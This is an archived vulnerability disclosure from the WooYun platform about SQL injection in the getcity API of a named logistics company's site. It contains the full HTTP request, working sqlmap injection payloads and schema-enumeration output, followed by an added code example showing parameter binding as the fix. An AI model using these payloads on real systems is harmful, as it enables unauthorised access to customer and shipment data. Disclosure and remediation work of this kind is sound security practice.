WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, read online -------- http://drop.zone.ci/
2016-04-06: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly. 2016-05-21: The vendor has actively ignored the vulnerability; details are disclosed to the public.
SQL injection on the Shenghui Logistics main site leaks all waybill information and user data
http://www.shenghui56.com/ The injection occurs here:
POST /api/getcity HTTP/1.1
Host: www.shenghui56.com
Content-Length: 10
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.shenghui56.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shenghui56.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997

pid=350000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:49:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:49:34] [INFO] fetching database (schema) names
[12:49:34] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HD
[*] MDSYS
[*] MWLAPP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SHAC
[*] SHEFFE
[*] SHITEM
[*] SHWLAPP
[*] SMS_XTTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:51:16] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:51:16] [INFO] fetching current database
[12:51:16] [INFO] resumed: SHWLAPP
current schema (equivalent to database on Oracle): 'SHWLAPP'
I only enumerated the number of databases; I did not dump the database or anything like that...
Filter the input, bro... the parameter is also user-controllable.
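The fix the reporter is asking for, as an added example that is not code from the report or from the site: the vulnerable string-splicing form of the city lookup next to a hardened form that allow-lists the value and binds it as a query parameter. The table, rows, and the `^\d{1,6}$` shape of a valid `pid` are assumptions; SQLite stands in for the site's Oracle backend, since the quoting behaviour the injection depends on is the same.

```python
import re
import sqlite3

# Constructed stand-in for the data behind POST /api/getcity (assumed schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE city (pid TEXT, name TEXT)")
conn.executemany("INSERT INTO city VALUES (?, ?)",
                 [("350000", "Fujian"), ("440000", "Guangdong")])

# The boolean-based blind value sqlmap reported for the pid parameter above.
PAYLOAD = "350000' AND 6309=6309 AND 'bqAV'='bqAV"

# Assumed shape of a legitimate region id: one to six digits, nothing else.
PID_RE = re.compile(r"^\d{1,6}$")


def get_city_vulnerable(pid: str) -> list:
    """Mirrors the flaw: pid is spliced into the SQL text, so a quote in
    the value closes the literal and the remainder is parsed as SQL."""
    sql = "SELECT name FROM city WHERE pid = '" + pid + "'"
    return [row[0] for row in conn.execute(sql)]


def get_city_bound(pid: str) -> list:
    """Parameter binding alone: the whole value is compared as data, so the
    injected clauses never reach the SQL parser and match no row."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM city WHERE pid = ?", (pid,))]


def is_valid_pid(pid: str) -> bool:
    """Allow-list check applied before any database access."""
    return PID_RE.fullmatch(pid) is not None


def get_city_fixed(pid: str) -> list:
    """Hardened handler: reject anything that is not a plausible id, then
    bind the value. Validation gives a clean 4xx path and a log signal;
    binding is what actually removes the injection."""
    if not is_valid_pid(pid):
        raise ValueError("invalid pid")
    return get_city_bound(pid)
```

Calling `get_city_vulnerable(PAYLOAD)` still returns the Fujian row even though no `pid` equals that string, which is exactly the signal a boolean-based blind probe relies on; the bound and validated forms do not.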
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)